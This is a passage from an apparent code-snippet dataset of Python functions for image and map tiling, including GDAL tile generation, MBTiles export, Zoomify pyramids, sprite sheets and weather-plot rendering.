wb = self.geo_query( ds, b[0], b[3], b[2], b[1], querysize=querysize)\n\n rx, ry, rxsize, rysize = rb\n wx, wy, wxsize, wysize = wb\n else: # 'raster' or 'gearth' or 'garmin' profile:\n tsize = int(self.tsize[tz]) # tilesize in raster coordinates for actual zoom\n xsize = self.out_ds.RasterXSize # size of the raster in pixels\n ysize = self.out_ds.RasterYSize\n if tz >= self.nativezoom:\n querysize = self.tilesize # int(2**(self.nativezoom-tz) * self.tilesize)\n\n rx = (tx) * tsize\n rxsize = 0\n if tx == tmaxx:\n rxsize = xsize % tsize\n if rxsize == 0:\n rxsize = tsize\n\n rysize = 0\n if ty_tms == tmaxy:\n rysize = ysize % tsize\n if rysize == 0:\n rysize = tsize\n ry = ysize - (ty_tms * tsize) - rysize\n\n wx, wy = 0, 0\n\n wxsize, wysize = int(rxsize/float(tsize) * querysize), int(rysize/float(tsize) * querysize)\n if wysize != querysize:\n wy = querysize - wysize\n xyzzy = Xyzzy(querysize, rx, ry, rxsize, rysize, wx, wy, wxsize, wysize)\n try:\n if self.options.verbose:\n print ti,'/',tcount,' total ; z =',tz,' ; x =',tx,' ; y_tms =',ty_tms,' ; y_osm =',ty_osm\n print \"\\tReadRaster Extent: \", (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize)\n self.write_base_tile(tx, ty, tz, xyzzy)\n except ImageOutputException, e:\n self.error(\"'%d/%d/%d': %s\" % (tz, tx, ty, e.message))\n\n if not self.options.verbose or self.is_subprocess:\n self.progressbar( ti / float(tcount) )\n if self.options.mbtiles:\n if self.mbtiles_db:\n self.mbtiles_db.close_db()\n self.mbtiles_db=None", "def paste_chaos(image, tiles, size, shadow_off_set=(30, 30)):\n # image_all = Image.new('RGB', image.size, 0xffffff)\n image_all = image\n lst = range(len(tiles))\n random.shuffle(lst)\n fragment_size = (image.size[0] / size[0], image.size[1] / size[1])\n print 'tiles size %d X %d' % fragment_size\n print 'number of tiles one iteration: %d' % len(lst)\n for i in lst:\n im = Image.open(tiles[i])\n degree = random.randint(-20, 20)\n im = thumbnail(rotate_image(drop_shadow(add_frame(im), shadow_off_set), degree), (fragment_size[0] * 3 / 2, fragment_size[1] * 3 / 2))\n x = i % size[0] * fragment_size[0] + random.randrange(-fragment_size[0] / 2, fragment_size[0] / 2)\n y = i / size[0] * fragment_size[1] + random.randrange(-fragment_size[1] / 2, fragment_size[1] / 2)\n # print x, y\n image_all.paste(im, (x, y), im)\n return image_all", "def visualize_MTL(**images):\r\n n = len(images)\r\n plt.figure(figsize=(16, 5))\r\n for i, (name, image) in enumerate(images.items()):\r\n if image==None:\r\n continue\r\n else:\r\n plt.subplot(1, n, i + 1)\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.title(' '.join(name.split('_')).title())\r\n plt.imshow(image)\r\n plt.show()", "def __init__(self, width, height, tilesize = 256, tileformat='jpg'):\n\n self.tilesize = tilesize\n self.tileformat = tileformat\n imagesize = (width, height)\n tiles = ( math.ceil( width / tilesize ), math.ceil( height / tilesize ) )\n\n # Size (in tiles) for each tier of pyramid.\n self.tierSizeInTiles = []\n self.tierSizeInTiles.push( tiles )\n\n # Image size in pixels for each pyramid tierself\n self.tierImageSize = []\n self.tierImageSize.append( imagesize );\n\n while (imagesize[0] > tilesize or imageSize[1] > tilesize ):\n imagesize = (math.floor( imagesize[0] / 2 ), math.floor( imagesize[1] / 2) )\n tiles = ( math.ceil( imagesize[0] / tilesize ), math.ceil( imagesize[1] / tilesize ) )\n self.tierSizeInTiles.append( tiles )\n self.tierImageSize.append( imagesize )\n\n self.tierSizeInTiles.reverse()\n self.tierImageSize.reverse()\n\n # Depth of the Zoomify pyramid, number of tiers (zoom levels)\n self.numberOfTiers = len(self.tierSizeInTiles)\n\n # Number of tiles up to the given tier of pyramid.\n self.tileCountUpToTier = []\n self.tileCountUpToTier[0] = 0\n for i in range(1, self.numberOfTiers+1):\n self.tileCountUpToTier.append(\n self.tierSizeInTiles[i-1][0] * self.tierSizeInTiles[i-1][1] + self.tileCountUpToTier[i-1]\n )", "def tile(X, rows, cols):\n tiling = np.zeros((rows * X.shape[1], cols * X.shape[2], X.shape[3]), dtype = X.dtype)\n for i in range(rows):\n for j in range(cols):\n idx = i * cols + j\n if idx < X.shape[0]:\n img = X[idx,...]\n tiling[\n i*X.shape[1]:(i+1)*X.shape[1],\n j*X.shape[2]:(j+1)*X.shape[2],\n :] = img\n return tiling", "def tile(X, rows, cols):\n tiling = np.zeros((rows * X.shape[1], cols * X.shape[2], X.shape[3]), dtype = X.dtype)\n for i in range(rows):\n for j in range(cols):\n idx = i * cols + j\n if idx < X.shape[0]:\n img = X[idx,...]\n tiling[\n i*X.shape[1]:(i+1)*X.shape[1],\n j*X.shape[2]:(j+1)*X.shape[2],\n :] = img\n return tiling", "def get_tiles_from_server(self, variants, server):\n def request_and_crop(zoom, x, y):\n _x = int(math.floor(x))\n _y = int(math.floor(y))\n\n x_mod = 0.5 - (x - _x) #How does this desviates from 0.5\n y_mod = 0.5 - (y - _y) \n\n if x_mod > 0:\n x_start = _x - 1 #1 tile before\n start_xpixel = int(math.floor((1-x_mod)*256))\n else:\n x_start = _x\n start_xpixel = int(math.floor(-1*x_mod*256))\n if y_mod > 0:\n y_start = _y - 1 #1 tile before\n start_ypixel = int(math.floor((1-y_mod)*256))\n else:\n y_start = _y\n start_ypixel = int(math.floor(-1*y_mod*256))\n\n tile = np.zeros((256*2, 256*2, 3), dtype= 'uint8')\n for x in range(2):\n for y in range(2):\n url = 'http://localhost:8080/{}/{}/{}.png'.format(zoom, x_start + x, y_start + y)\n resp = urlopen(url)\n image = np.asarray(bytearray(resp.read()), dtype=\"uint8\")\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n tile[256*y:256*(y+1), 256*x:256*(x+1),...] = image\n tile = tile[start_ypixel:start_ypixel+256,start_xpixel:start_xpixel+256]\n return tile\n tiles = []\n for _ in range(variants):\n zoom = random.randint(19,21)\n x, y = self.getXY(zoom) \n tile = request_and_crop(zoom, x, y)\n tile = cv2.resize(tile, (self.width, self.height))\n tiles.append(tile)\n tiles = np.stack(tiles)\n return tiles", "def stitch(dir_path, in_canels=1, choice=0):\n directory = dir_path\n array = [] # array used to create matrix\n\n p = re.compile(tiles_xy_re)\n q = re.compile(original_img_xy_re)\n\n sum_of_files = len(os.listdir(directory))\n tiles_horizontal_num = 0\n\n first = os.listdir(directory)[0] # we take a sample to extract\n # original image information such as height, width, type\n\n original = q.match(first)\n Original_width, Original_height = int(original.group(1)), int(\n original.group(2))\n im = Image.open(dir_path + '\\\\' + first)\n\n tile_h = np.array(im).shape[0]\n tile_w= np.array(im).shape[1]\n file_type = first.split(\".\")[-1]\n\n # creating array to merge all tiles to\n if choice == 2: # if we choose and\n output_array = np.ones((Original_height, Original_width, in_canels))\n else:\n output_array = np.zeros((Original_height, Original_width, in_canels))\n\n for filename in os.listdir(directory):\n\n xy = p.match(filename)\n x, y = int(xy.group(1)), int(xy.group(2)) # extracting x,y relative\n # to original img\n\n im = Image.open(dir_path + '\\\\' + filename)\n if choice == 0:\n output_array[y:y + tile_h, x:x + tile_w, :] = np.array(im)\n elif choice == 1:\n output_array[y:y + tile_h, x:x + tile_w, :] = np.logical_or(\n output_array[y:y + tile_h, x:x + tile_w, :], np.array(im))\n elif choice == 2:\n output_array[y:y + tile_h, x:x + tile_w, :] = np.logical_and(\n output_array[y:y + tile_h, x:x + tile_w, :], np.array(im))\n\n output_array[y:y + tile_h, x:x + tile_w, :] = np.array(im)\n\n array.append([x, y])\n\n if int(xy.group(1)) == 0:\n tiles_horizontal_num = tiles_horizontal_num + 1\n\n # converting array to image and saving image\n output_im = Image.fromarray(output_array.astype(np.uint8))\n file_name = \"original.\" + file_type\n path = dir_path + '\\\\' + file_name\n output_im.save(path)\n\n # array = sorted(array, key=lambda k: [k[0], k[1]])\n # numpy_array = np.array(array)\n # matrix = numpy_array.reshape(sum_of_files // tiles_horizontal_num,\n # tiles_horizontal_num, 2)", "def apply_tiles(self, code: str) -> 'ImageCollection':\n\n process_id = 'apply_tiles'\n args = {\n 'imagery':self.graph,\n 'code':{\n 'language':'python',\n 'source':code\n }\n }\n\n return self.graph_add_process(process_id, args)", "def apply_tiles(self, code: str) -> 'ImageCollection':\n\n process_id = 'apply_tiles'\n args = {\n 'imagery':self.graph,\n 'code':{\n 'language':'python',\n 'source':code\n }\n }\n\n return self.graph_add_process(process_id, args)", "def get_template_series(self, nb_images):\n\n # Tab for the series of images\n self.template = []\n\n # Tab\n temp = []\n\n # Make current position the zero position\n self.arm.set_to_zero([0, 1, 2])\n self.microscope.set_to_zero([0, 1, 2])\n\n # Take imges only in the template zone\n template = self.template_zone()\n height, width = template.shape[:2]\n\n # Tab of weight to detect where the pipette is\n weight = []\n\n # Detecting the tip\n for i in range(3):\n for j in range(3):\n if (i != 1) & (j != 1):\n # divide template zone into 8 images\n temp = template[i * height / 4:height / 2 + i * height / 4, j * width / 4:width / 2 + j * width / 4]\n\n # Search the tip using the number of darkest pixel in the image\n bin_edge, _ = np.histogram(temp.flatten())\n weight += [bin_edge.min()]\n else:\n # image is the center of template zone, do not consider to have functional get_withdraw_sign method\n weight += [-1]\n\n # pipette is in the image with the most darkest pixels\n index = weight.index(max(weight))\n j = index % 3\n i = index // 3\n\n # Update the position of the tip in image\n self.template_loc = [temp.shape[1] * (1 - j / 2.), temp.shape[0] * (1 - i / 2.)]\n\n # Get the series of template images at different height\n for k in range(nb_images):\n self.microscope.absolute_move(k - (nb_images - 1) / 2, 2)\n self.microscope.wait_motor_stop(2)\n time.sleep(1)\n img = self.template_zone()\n height, width = img.shape[:2]\n img = img[i * height / 4:height / 2 + i * height / 4, j * width / 4:width / 2 + j * width / 4]\n self.template += [img]\n\n # reset position at the end\n self.go_to_zero()\n pass", "def make_floor(self):\n\n for y in range(0, self.num_tiles[1] + 1):\n for x in range(0, self.num_tiles[0] + 1):\n offset = (x * self.tile.size[0], y * self.tile.size[1])\n self.image.blit(self.tile.image, offset)", "def genImages(self, gen_ts):\n t1 = time.time()\n ngen = 0\n\n # determine how much logging is desired\n log_success = to_bool(search_up(self.image_dict, 'log_success', True))\n\n # Loop over each time span class (day, week, month, etc.):\n for timespan in self.image_dict.sections:\n\n # Now, loop over all plot names in this time span class:\n for plotname in self.image_dict[timespan].sections:\n\n # Accumulate all options from parent nodes:\n plot_options = accumulateLeaves(self.image_dict[timespan][plotname])\n\n plotgen_ts = gen_ts\n if not plotgen_ts:\n binding = plot_options['data_binding']\n db_manager = self.db_binder.get_manager(binding)\n plotgen_ts = db_manager.lastGoodStamp()\n if not plotgen_ts:\n plotgen_ts = time.time()\n\n image_root = os.path.join(self.config_dict['WEEWX_ROOT'],\n plot_options['HTML_ROOT'])\n # Get the path that the image is going to be saved to:\n img_file = os.path.join(image_root, '%s.png' % plotname)\n\n # Convert from string to an integer:\n ai = weeutil.weeutil.nominal_spans(plot_options.get('aggregate_interval'))\n # Check whether this plot needs to be done at all:\n if skipThisPlot(plotgen_ts, ai, img_file):\n continue\n\n # skip image files that are fresh, but only if staleness is defined\n stale = to_int(plot_options.get('stale_age'))\n if stale:\n t_now = time.time()\n try:\n last_mod = os.path.getmtime(img_file)\n if t_now - last_mod < stale:\n log.debug(\"Skip '%s': last_mod=%s age=%s stale=%s\",\n img_file, last_mod, t_now - last_mod, stale)\n continue\n except os.error:\n pass\n\n # Create the subdirectory that the image is to be put in. Wrap in a try block in\n # case it already exists.\n try:\n os.makedirs(os.path.dirname(img_file))\n except OSError:\n pass\n\n # Create a new instance of a time plot and start adding to it\n plot = weeplot.genplot.TimePlot(plot_options)\n\n # Calculate a suitable min, max time for the requested time.\n minstamp, maxstamp, timeinc = weeplot.utilities.scaletime(\n plotgen_ts - int(plot_options.get('time_length', 86400)), plotgen_ts)\n # Override the x interval if the user has given an explicit interval:\n timeinc_user = to_int(plot_options.get('x_interval'))\n if timeinc_user is not None:\n timeinc = timeinc_user\n plot.setXScaling((minstamp, maxstamp, timeinc))\n\n # Set the y-scaling, using any user-supplied hints:\n yscale = plot_options.get('yscale', ['None', 'None', 'None'])\n plot.setYScaling(weeutil.weeutil.convertToFloat(yscale))\n\n # Get a suitable bottom label:\n bottom_label_format = plot_options.get('bottom_label_format', '%m/%d/%y %H:%M')\n bottom_label = time.strftime(bottom_label_format, time.localtime(plotgen_ts))\n plot.setBottomLabel(bottom_label)\n\n # Set day/night display\n plot.setLocation(self.stn_info.latitude_f, self.stn_info.longitude_f)\n plot.setDayNight(to_bool(plot_options.get('show_daynight', False)),\n weeplot.utilities.tobgr(plot_options.get('daynight_day_color',\n '0xffffff')),\n weeplot.utilities.tobgr(plot_options.get('daynight_night_color',\n '0xf0f0f0')),\n weeplot.utilities.tobgr(plot_options.get('daynight_edge_color',\n '0xefefef')))\n\n # Loop over each line to be added to the plot.\n for line_name in self.image_dict[timespan][plotname].sections:\n\n # Accumulate options from parent nodes.\n line_options = accumulateLeaves(self.image_dict[timespan][plotname][line_name])\n\n # See what observation type to use for this line. By default, use the section\n # name.\n var_type = line_options.get('data_type', line_name)\n\n # Look for aggregation type:\n aggregate_type = line_options.get('aggregate_type')\n if aggregate_type in (None, '', 'None', 'none'):\n # No aggregation specified.\n aggregate_type = aggregate_interval = None\n else:\n try:\n # Aggregation specified. Get the interval.\n aggregate_interval = weeutil.weeutil.nominal_spans(\n line_options['aggregate_interval'])\n except KeyError:\n log.error(\"Aggregate interval required for aggregate type %s\",\n aggregate_type)\n log.error(\"Line type %s skipped\", var_type)\n continue\n\n # Now its time to find and hit the database:\n binding = line_options['data_binding']\n db_manager = self.db_binder.get_manager(binding)\n # we need to pass the line options and plotgen_ts to our xtype\n # first get a copy of line_options\n option_dict = dict(line_options)\n # but we need to pop off aggregate_type and\n # aggregate_interval as they are used as explicit arguments\n # in our xtypes call\n option_dict.pop('aggregate_type', None)\n option_dict.pop('aggregate_interval', None)\n # then add plotgen_ts\n option_dict['plotgen_ts'] = plotgen_ts\n start_vec_t, stop_vec_t ,data_vec_t = weewx.xtypes.get_series(\n var_type,\n TimeSpan(minstamp, maxstamp),\n db_manager,\n aggregate_type=aggregate_type,\n aggregate_interval=aggregate_interval,\n **option_dict)\n\n # Get the type of plot (\"bar', 'line', or 'vector')\n plot_type = line_options.get('plot_type', 'line').lower()\n\n if aggregate_type and plot_type != 'bar':\n # If aggregating, put the point in the middle of the interval\n start_vec_t = ValueTuple(\n [x - aggregate_interval / 2.0 for x in start_vec_t[0]], # Value\n start_vec_t[1], # Unit\n start_vec_t[2]) # Unit group\n stop_vec_t = ValueTuple(\n [x - aggregate_interval / 2.0 for x in stop_vec_t[0]], # Velue\n stop_vec_t[1], # Unit\n stop_vec_t[2]) # Unit group\n\n # Convert the data to the requested units\n new_data_vec_t = self.converter.convert(data_vec_t)\n\n # Add a unit label. NB: all will get overwritten except the last. Get the label\n # from the configuration dictionary.\n unit_label = line_options.get(\n 'y_label', self.formatter.get_label_string(new_data_vec_t[1]))\n # Strip off any leading and trailing whitespace so it's easy to center\n plot.setUnitLabel(unit_label.strip())\n\n # See if a line label has been explicitly requested:\n label = line_options.get('label')\n if label:\n # Yes. Get the text translation\n label = self.text_dict[label]\n else:\n # No explicit label. Look up a generic one.\n # NB: generic_dict is a KeyDict which will substitute the key\n # if the value is not in the dictionary.\n label = self.generic_dict[var_type]\n\n # See if a color has been explicitly requested.\n color = line_options.get('color')\n if color is not None: color = weeplot.utilities.tobgr(color)\n fill_color = line_options.get('fill_color')\n if fill_color is not None: fill_color = weeplot.utilities.tobgr(fill_color)\n\n # Get the line width, if explicitly requested.\n width = to_int(line_options.get('width'))\n\n interval_vec = None\n gap_fraction = None\n vector_rotate = None\n\n # Some plot types require special treatments:\n if plot_type == 'vector':\n vector_rotate_str = line_options.get('vector_rotate')\n vector_rotate = -float(vector_rotate_str) \\\n if vector_rotate_str is not None else None\n elif plot_type == 'bar':\n interval_vec = [x[1] - x[0] for x in\n zip(start_vec_t.value, stop_vec_t.value)]\n elif plot_type == 'line':\n gap_fraction = to_float(line_options.get('line_gap_fraction'))\n if gap_fraction is not None and not 0 < gap_fraction < 1:\n log.error(\"Gap fraction %5.3f outside range 0 to 1. Ignored.\",\n gap_fraction)\n gap_fraction = None\n else:\n log.error(\"Unknown plot type '%s'. Ignored\", plot_type)\n continue\n\n # Get the type of line (only 'solid' or 'none' for now)\n line_type = line_options.get('line_type', 'solid')\n if line_type.strip().lower() in ['', 'none']:\n line_type = None\n\n marker_type = line_options.get('marker_type')\n marker_size = to_int(line_options.get('marker_size', 8))\n \n # Add the line to the emerging plot:\n plot.addLine(weeplot.genplot.PlotLine(\n stop_vec_t[0], new_data_vec_t[0],\n label = label,\n color = color,\n fill_color = fill_color,\n width = width,\n plot_type = plot_type,\n line_type = line_type,\n marker_type = marker_type,\n marker_size = marker_size,\n bar_width = interval_vec,\n vector_rotate = vector_rotate,\n gap_fraction = gap_fraction))\n\n # OK, the plot is ready. Render it onto an image\n image = plot.render()\n\n try:\n # Now save the image\n image.save(img_file)\n ngen += 1\n except IOError as e:\n log.error(\"Unable to save to file '%s' %s:\", img_file, e)\n t2 = time.time()\n\n if log_success:\n log.info(\"Generated %d images for report %s in %.2f seconds\",\n ngen,\n self.skin_dict['REPORT_NAME'], t2 - t1)", "def mbtiles(ctx, files, output, overwrite, title, description,\n layer_type, img_format, tile_size, zoom_levels, image_dump,\n num_workers, src_nodata, dst_nodata, resampling):\n output, files = resolve_inout(files=files, output=output,\n overwrite=overwrite)\n inputfile = files[0]\n\n logger = logging.getLogger('rio-mbtiles')\n\n with ctx.obj['env']:\n\n # Read metadata from the source dataset.\n with rasterio.open(inputfile) as src:\n\n validate_nodata(dst_nodata, src_nodata, src.profile.get('nodata'))\n base_kwds = {'dst_nodata': dst_nodata, 'src_nodata': src_nodata}\n\n if src_nodata is not None:\n base_kwds.update(nodata=src_nodata)\n\n if dst_nodata is not None:\n base_kwds.update(nodata=dst_nodata)\n\n # Name and description.\n title = title or os.path.basename(src.name)\n description = description or src.name\n\n # Compute the geographic bounding box of the dataset.\n (west, east), (south, north) = transform(\n src.crs, 'EPSG:4326', src.bounds[::2], src.bounds[1::2])\n\n # Resolve the minimum and maximum zoom levels for export.\n if zoom_levels:\n minzoom, maxzoom = map(int, zoom_levels.split('..'))\n else:\n zw = int(round(math.log(360.0 / (east - west), 2.0)))\n zh = int(round(math.log(170.1022 / (north - south), 2.0)))\n minzoom = min(zw, zh)\n maxzoom = max(zw, zh)\n\n logger.debug(\"Zoom range: %d..%d\", minzoom, maxzoom)\n\n # Parameters for creation of tile images.\n base_kwds.update({\n 'driver': img_format.upper(),\n 'dtype': 'uint8',\n 'nodata': 0,\n 'height': tile_size,\n 'width': tile_size,\n 'count': 3,\n 'crs': TILES_CRS})\n\n img_ext = 'jpg' if img_format.lower() == 'jpeg' else 'png'\n\n # Initialize the sqlite db.\n if os.path.exists(output):\n os.unlink(output)\n # workaround for bug here: https://bugs.python.org/issue27126\n sqlite3.connect(':memory:').close()\n\n conn = sqlite3.connect(output)\n cur = conn.cursor()\n cur.execute(\n \"CREATE TABLE tiles \"\n \"(zoom_level integer, tile_column integer, \"\n \"tile_row integer, tile_data blob);\")\n cur.execute(\n \"CREATE TABLE metadata (name text, value text);\")\n\n # Insert mbtiles metadata into db.\n cur.execute(\n \"INSERT INTO metadata (name, value) VALUES (?, ?);\",\n (\"name\", title))\n cur.execute(\n \"INSERT INTO metadata (name, value) VALUES (?, ?);\",\n (\"type\", layer_type))\n cur.execute(\n \"INSERT INTO metadata (name, value) VALUES (?, ?);\",\n (\"version\", \"1.1\"))\n cur.execute(\n \"INSERT INTO metadata (name, value) VALUES (?, ?);\",\n (\"description\", description))\n cur.execute(\n \"INSERT INTO metadata (name, value) VALUES (?, ?);\",\n (\"format\", img_ext))\n cur.execute(\n \"INSERT INTO metadata (name, value) VALUES (?, ?);\",\n (\"bounds\", \"%f,%f,%f,%f\" % (west, south, east, north)))\n\n conn.commit()\n\n # Create a pool of workers to process tile tasks.\n pool = Pool(num_workers, init_worker,\n (inputfile, base_kwds, resampling), 100)\n\n # Constrain bounds.\n EPS = 1.0e-10\n west = max(-180 + EPS, west)\n south = max(-85.051129, south)\n east = min(180 - EPS, east)\n north = min(85.051129, north)\n\n # Initialize iterator over output tiles.\n tiles = mercantile.tiles(\n west, south, east, north, range(minzoom, maxzoom + 1))\n\n for tile, contents in pool.imap_unordered(process_tile, tiles):\n\n if contents is None:\n logger.info(\"Tile %r is empty and will be skipped\", tile)\n continue\n\n # MBTiles has a different origin than Mercantile/tilebelt.\n tiley = int(math.pow(2, tile.z)) - tile.y - 1\n\n # Optional image dump.\n if image_dump:\n img_name = '%d-%d-%d.%s' % (\n tile.x, tiley, tile.z, img_ext)\n img_path = os.path.join(image_dump, img_name)\n with open(img_path, 'wb') as img:\n img.write(contents)\n\n # Insert tile into db.\n cur.execute(\n \"INSERT INTO tiles \"\n \"(zoom_level, tile_column, tile_row, tile_data) \"\n \"VALUES (?, ?, ?, ?);\",\n (tile.z, tile.x, tiley, buffer(contents)))\n\n conn.commit()\n\n conn.close()\n # Done!", "def make_images(self):\n self._images = [tree.to_image() for tree in self.reaction_trees]\n self._update_route_dict(self._images, \"image\")", "def gen_tasks(self):\n for zoom in range(MIN_ZOOM, MAX_ZOOM + 1):\n seen = set() # (x, y)\n M = 2 ** zoom - 1\n # Find all areas suitable for zoom\n for area in Area.objects.filter(is_active=True,\n min_zoom__lte=zoom,\n max_zoom__gte=zoom):\n # Get area tiles\n SW = ll_to_xy(zoom, area.SW)\n NE = ll_to_xy(zoom, area.NE)\n left = max(SW[0] - PAD_TILES, 0)\n right = min(NE[0] + PAD_TILES, M)\n top = max(NE[1] - PAD_TILES, 0)\n bottom = min(SW[1] + PAD_TILES, M)\n a_size = (right - left + 1) * (bottom - top + 1)\n self.log(\"Checking area '%s' at zoom level %d \"\\\n \" (%d x %d = %d tiles)\" % (area.name, zoom,\n right - left + 1,\n bottom - top + 1,\n a_size))\n seen |= set((tc.x, tc.y) for tc in TileCache.objects.filter(\n map=self.map.id, zoom=zoom).only(\"x\", \"y\"))\n for x in range(left, right + 1):\n for y in range(top, bottom + 1):\n c = (x, y)\n if c in seen:\n continue\n seen.add(c)\n if not self.force:\n # Check tile is ready\n tc = TileCache.objects.filter(map=self.map.id,\n zoom=zoom, x=x,\n y=y).first()\n if tc and tc.ready:\n continue\n yield (zoom, x, y)", "def appendpics(pathofimg, w_sub, h_sub, step):\n num = 0\n dirlist = []\n images = [] # images in each folder\n for root, dirs, fileswer in os.walk(pathofimg):\n if len(dirs)!= 0:\n for dir in dirs:\n dirlist.append(dir)\n for rooert, dirwerwes, files in os.walk(pathofimg+'/'+dir):\n for file in files:\n if(file.endswith('.png')):\n images.append(Image.open(pathofimg+'/'+dir+'/'+file))\n if(len(images)==81):\n break\n target = montage(images, w_sub, h_sub, step)\n target.save(pathofimg +'/'+ dir + '.png', quality=100)\n else:\n dir = 'Generated'\n for file in fileswer:\n if (file.endswith('.png')):\n images.append(Image.open(pathofimg +'/'+ file))\n target1 = montage(images, w_sub, h_sub, step)\n savepath = pathofimg +'/'+ 'generated'\n os.makedirs(savepath)\n target1.save(savepath +'/'+ dir + '.png', quality=100)", "def tiles_to_images(wfc_ns, tile_grid, tile_catalog, tile_size, visualize=False, partial=False, grid_count=None):\n new_img = np.zeros((tile_grid.shape[0] * tile_size, tile_grid.shape[1] * tile_size, wfc_ns.channels), dtype=np.int64)\n if partial and (len(tile_grid.shape) > 2):\n for i in range(tile_grid.shape[0]):\n for j in range(tile_grid.shape[1]):\n for u in range(wfc_ns.tile_size):\n for v in range(wfc_ns.tile_size):\n pixel_merge_list = []\n for k in range(tile_grid.shape[2]):\n tile = tile_grid[i,j,k]\n ## If we want to display a partial pattern, it is helpful to\n ## be able to show empty cells. Therefore, in visualize mode,\n ## we use -1 as a magic number for a non-existant tile.\n pixel = None#[200, 0, 200]\n #print(tile)\n if (visualize) and ((-1 == tile) or (-2 == tile)):\n if (-1 == tile):\n pixel = [200, 0, 200]\n if 0 == (i + j) % 2:\n pixel = [255, 0, 255]\n else:\n pixel = [0, 255, 255]\n else:\n if (WFC_PARTIAL_BLANK != tile) and (WFC_NULL_VALUE != tile): # TODO: instead of -3, use MaskedArrays\n pixel = tile_catalog[tile][u,v]\n if not(pixel is None):\n pixel_merge_list.append(pixel)\n if len(pixel_merge_list) == 0:\n if 0 == (i + j) % 2:\n pixel_merge_list.append([255, 0, 255])\n else:\n pixel_merge_list.append([0, 172, 172])\n \n if len(pixel_merge_list) > 0:\n pixel_to_add = pixel_merge_list[0]\n if len(pixel_merge_list) > 1:\n pixel_to_add = [round(sum(x) / len(pixel_merge_list)) for x in zip(*pixel_merge_list)]\n try:\n while (len(pixel_to_add) < wfc_ns.channels):\n pixel_to_add.append(255)\n new_img[(i*wfc_ns.tile_size)+u, (j*wfc_ns.tile_size)+v] = pixel_to_add\n except TypeError as e:\n wfc_logger.warning(e)\n wfc_logger.warning(\"Tried to add {} from {}\".format(pixel_to_add, pixel_merge_list))\n else:\n for i in range(tile_grid.shape[0]):\n for j in range(tile_grid.shape[1]):\n tile = tile_grid[i,j]\n for u in range(wfc_ns.tile_size):\n for v in range(wfc_ns.tile_size):\n ## If we want to display a partial pattern, it is helpful to\n ## be able to show empty cells. Therefore, in visualize mode,\n ## we use -1 as a magic number for a non-existant tile.\n pixel = [200, 0, 200]\n #print(f\"tile: {tile}\")\n if (visualize) and ((-1 == tile) or (-2 == tile)):\n if (-1 == tile):\n if 0 == (i + j) % 2:\n pixel = [255, 0, 255]\n if (-2 == tile):\n pixel = [0, 255, 255]\n else:\n if (WFC_PARTIAL_BLANK != tile):\n pixel = tile_catalog[tile][u,v]\n # Watch out for images with more than 3 channels!\n new_img[(i*wfc_ns.tile_size)+u, (j*wfc_ns.tile_size)+v] = np.resize(pixel, new_img[(i*wfc_ns.tile_size)+u, (j*wfc_ns.tile_size)+v].shape)\n logging.debug('Output image shape is', new_img.shape)\n return new_img", "def get_images_from_sheet(sheet, width, height):\n sprites = []\n dest_rect = pygame.Rect((0, 0), (width, height))\n total = sheet.get_width() / width\n i = 0\n while i < total:\n image = pygame.Surface((width, height))\n image.blit(sheet, (0,0), ((width * i), 0, width, height))\n image.set_colorkey((0,0,0))\n sprites.append(image)\n i += 1\n\n return sprites", "def dynamic_tile(slide_name, row, col, small_tile_in_tile=False):\n tile_summary = dynamic_tiles(slide_name, small_tile_in_tile)\n tile = tile_summary.get_tile(row, col)\n return tile", "def build_tiles(cls):\n\n LOGGER.debug(\"Building tiles\")\n\n for tile_id in tiledata.TILE_DATA:\n if not Tile.tile_factory(tile_id):\n LOGGER.error(\"Could not construct tile with ID %d\", tile_id)\n sys.exit(1)", "def __init__(self, width, height, tilesize=256, tileformat='jpg'):\n\n self.tilesize = tilesize\n self.tileformat = tileformat\n imagesize = (width, height)\n tiles = (math.ceil(width / tilesize), math.ceil(height / tilesize))\n\n # Size (in tiles) for each tier of pyramid.\n self.tierSizeInTiles = []\n self.tierSizeInTiles.append(tiles)\n\n # Image size in pixels for each pyramid tierself\n self.tierImageSize = []\n self.tierImageSize.append(imagesize)\n\n while (imagesize[0] > tilesize or imagesize[1] > tilesize):\n imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2))\n tiles = (math.ceil(imagesize[0] / tilesize), math.ceil(imagesize[1] / tilesize))\n self.tierSizeInTiles.append(tiles)\n self.tierImageSize.append(imagesize)\n\n self.tierSizeInTiles.reverse()\n self.tierImageSize.reverse()\n\n # Depth of the Zoomify pyramid, number of tiers (zoom levels)\n self.numberOfTiers = len(self.tierSizeInTiles)\n\n # Number of tiles up to the given tier of pyramid.\n self.tileCountUpToTier = []\n self.tileCountUpToTier[0] = 0\n for i in range(1, self.numberOfTiers+1):\n self.tileCountUpToTier.append(\n self.tierSizeInTiles[i-1][0] * self.tierSizeInTiles[i-1][1] +\n self.tileCountUpToTier[i-1]\n )", "def __init__tiles__(self):\n return [[Tiles(i, j, Tiles.closed) for j in range(self.cols)] for i in range(self.rows)]", "def prepare_map(self):\n for y_coord, row in enumerate(self.contents):\n for x_coord, tile in enumerate(row):\n bit_map = self.get_tile_bitmap(tile)\n self.image[y_coord * TILE_SIZE:(y_coord+1) * TILE_SIZE,\n x_coord * TILE_SIZE:(x_coord+1) * TILE_SIZE] = bit_map", "def _iter_images_rects(self):\n image_x = self._margin\n image_y = self._margin\n total_width = self.width - 2 * self._margin\n total_height = self.height - self._texts_height - 2 * self._margin\n\n if len(self._images) == 1:\n image_width = total_width\n image_height = total_height\n elif 2 <= len(self._images) < 4:\n if self.is_portrait:\n image_width = total_width\n image_height = (total_height - (len(self._images) - 1) * self._margin) // len(self._images)\n else:\n image_width = (total_width - (len(self._images) - 1) * self._margin) // len(self._images)\n image_height = total_height\n else:\n image_width = (total_width - self._margin) // 2\n image_height = (total_height - self._margin) // 2\n\n yield image_x, image_y, image_width, image_height\n\n if 2 <= len(self._images) < 4:\n if self.is_portrait:\n image_y += image_height + self._margin\n else:\n image_x += image_width + self._margin\n yield image_x, image_y, image_width, image_height\n\n if 3 <= len(self._images) < 4:\n if self.is_portrait:\n image_y += image_height + self._margin\n else:\n image_x += image_width + self._margin\n yield image_x, image_y, image_width, image_height\n\n if len(self._images) == 4:\n image_x += image_width + self._margin\n yield image_x, image_y, image_width, image_height\n image_y += image_height + self._margin\n image_x = self._margin\n yield image_x, image_y, image_width, image_height\n image_x += image_width + self._margin\n yield image_x, image_y, image_width, image_height", "def extract_data(filename, num_images, starting_id, context_factor):\n imgs = []\n for i in range(starting_id, num_images+starting_id):\n imageid = 